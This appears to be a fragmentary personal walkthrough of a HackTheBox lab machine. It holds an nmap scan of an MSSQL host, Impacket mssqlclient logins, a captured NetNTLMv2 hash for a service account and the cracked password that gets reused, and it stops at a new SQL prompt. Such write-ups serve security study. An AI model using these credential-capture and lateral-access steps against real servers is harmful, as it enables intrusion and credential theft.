Diff medium
#2025.11.11
adding the IP
sudo nano /etc/hosts
network scan
3% > nmap -Pn -sV -sC 10.10.11.90
Starting Nmap 7.98 ( <https://nmap.org> ) at 2025-11-11 17:15 +0800
Nmap scan report for dc01.signed.htb (10.10.11.90)
Host is up (0.28s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
| 10.10.11.90:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.90:1433:
| Target_Name: SIGNED
| NetBIOS_Domain_Name: SIGNED
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: SIGNED.HTB
| DNS_Computer_Name: DC01.SIGNED.HTB
| DNS_Tree_Name: SIGNED.HTB
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-11-11T09:17:58+00:00; -5s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-11-10T10:03:58
|_Not valid after: 2055-11-10T10:03:58
Host script results:
|_clock-skew: mean: -2s, deviation: 4s, median: -5s
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 158.23 seconds
Mssqclient command
htb/vpn/lab
5% ❯ mssqlclient.py scott:Sm230#C5NatH@10.10.11.90
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (scott guest@master)> shell
SQL (scott guest@master)> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
enum_db - enum databases
enum_links - enum linked servers
enum_impersonate - check logins that can be impersonated
enum_logins - enum login users
enum_users - enum current db users
enum_owner - enum db owner
exec_as_user {user} - impersonate with execute as user
exec_as_login {login} - impersonate with execute as login
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
xp_dirtree {path} - executes xp_dirtree on the path
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
use_link {link} - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
! {cmd} - executes a local shell cmd
upload {from} {to} - uploads file {from} to the SQLServer host {to}
download {from} {to} - downloads file from the SQLServer host {from} to {to}
show_query - show query
mask_query - mask query
With the responder setup i got
htb/machine/signed
> cat hash.txt
mssqlsvc::SIGNED:507e650750656252:CD6B8DC6B92052023D763254D032D8AC:0101000000000000802A2928CF4CDC01B3277C3BF55C281B00000000020008003900370051004B0001001E00570049004E002D00580042004A005300490035004700450037003000590004003400570049004E002D00580042004A00530049003500470045003700300059002E003900370051004B002E004C004F00430041004C00030014003900370051004B002E004C004F00430041004C00050014003900370051004B002E004C004F00430041004C0007000800802A2928CF4CDC010600040002000000080030003000000000000000000000000030000037BBC58AAA2FBF518AFD2E7FF4EBB3BB5C663BD4982E010414EA910F992FDF370A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00370033000000000000000000
htb/machine/signed
>
which i cracked
Again logging in
htb/vpn/lab took 3s
> mssqlclient.py SIGNED/mssqlsvc:'purPLE9795!@'@10.10.11.90 -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (SIGNED\\mssqlsvc guest@master)>